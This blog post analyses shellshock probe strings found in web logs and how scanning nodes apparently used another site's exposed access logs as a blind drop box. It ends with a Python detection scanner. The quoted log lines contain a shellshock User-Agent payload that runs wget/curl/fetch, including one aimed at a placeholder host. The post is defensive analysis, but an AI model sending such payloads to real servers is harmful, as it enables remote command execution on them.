Indirect shellshock security scanning via other people's logfiles

One of my friends noted that he'd spotted a shellshock-style user-agent string in his web log files, looking like:

- - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget -O /dev/null;wget1 -O /dev/null;curl -o /dev/null;/usr/sfwbin/wget;fetch -/dev/null'"

Curious about whether it was a legitimate domain (perhaps owned), I googled the domain name:

Seasonally-appropriate designer labels.  Doesn't really seem like the kind of thing a white-hat security scanner would be pretending to be.  Was the domain compromised, and should I try to notify them? Hmm.  What the heck - try to download the page:

 --2016-04-30 13:38:26-- 
Resolving (
Connecting to (||:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2016-04-30 13:38:26 ERROR 404: Not Found.

They weren't sending a malicious payload - and the scanning had sent the results to /dev/null anyway.  Googling IPTRANSITTEST turned up a few hits in other people's logfiles... wait a second.  Logfiles.  What if had left its logfiles visible in some way, and an attacker was using this as a blind drop to find the results of their scanning without needing to collect any data back from the scanning nodes?

My first guess proved startlingly lucky:
Looking at the contents of one access log, quite a few IP addresses have downloaded the logfiles themselves, so I didn't dig further.

It's pretty clear, though, what happened:  These logfiles are easily found via a bit of "Google-scanning":
Having located an accessible drop-box to collect the results, someone recruited a set of nodes to scan lots of websites with a custom user-agent.  By using the drop-box, these nodes never need to contact the controller / response collector:  they're completely fire-and-forget, and thus, could be distributed as malware or in a host of other ways.  At some point, the controller wants to get the entries.  He/she then can just download the raw access files using Tor, finding all sorts of juicy entries like:

XXX.XXX.XXX.XXX [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.19.1 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2" ""
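As an added illustration (not code from the original post), here is a small Python scanner for your own access logs that pulls out the two kinds of entries this story turns on: the shellshock-style user-agent, with whatever callback URLs its payload tries to fetch, and requests for the IPTRANSITTEST marker path that suggest your server is being used as someone's drop box. The sample log lines, the RFC 5737 IP addresses and the drop.example host are constructed placeholders.

```python
import re

# Apache/nginx combined log format, with the User-Agent as the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# The shellshock trigger: an empty bash function definition followed by commands.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')
# URLs fetched by the payload: the callback / drop-box the scanning node reports to.
URL_RE = re.compile(r'https?://[^\s;\'"]+')
# Marker path the scanning nodes request on the drop box (as seen in the logs above).
DROP_MARKER = "IPTRANSITTEST"

def parse_line(line):
    """Return the fields of one combined-format log line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(rec):
    """Label a parsed record: shellshock probe, drop-box marker hit, or benign."""
    if SHELLSHOCK_RE.search(rec["ua"]):
        return "shellshock_probe"
    if DROP_MARKER in rec["path"]:
        return "drop_marker"
    return "benign"

def scan_log(text):
    """Return (ip, label, callback_urls) for every suspicious line in a log."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label == "benign":
            continue
        # Deduplicate the URLs while keeping their order of appearance.
        urls = list(dict.fromkeys(URL_RE.findall(rec["ua"]))) if label == "shellshock_probe" else []
        findings.append((rec["ip"], label, urls))
    return findings

# Constructed sample lines: RFC 5737 test addresses, drop.example is a placeholder host.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Apr/2016:16:55:30 -0500] "GET / HTTP/1.1" 403 4961 "-" "() { :; }; /bin/sh -c 'wget -O /dev/null http://drop.example/IPTRANSITTEST;curl -o /dev/null http://drop.example/IPTRANSITTEST'"
198.51.100.9 - - [30/Apr/2016:09:25:12 -0700] "GET /IPTRANSITTEST HTTP/1.1" 404 73 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7"
192.0.2.5 - - [30/Apr/2016:10:00:01 -0700] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""
```

Run `scan_log` over a real access log and the callback URLs it returns are the hosts worth checking for an exposed log directory; a burst of `drop_marker` hits from many different source addresses is the signature of your own server being used this way.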
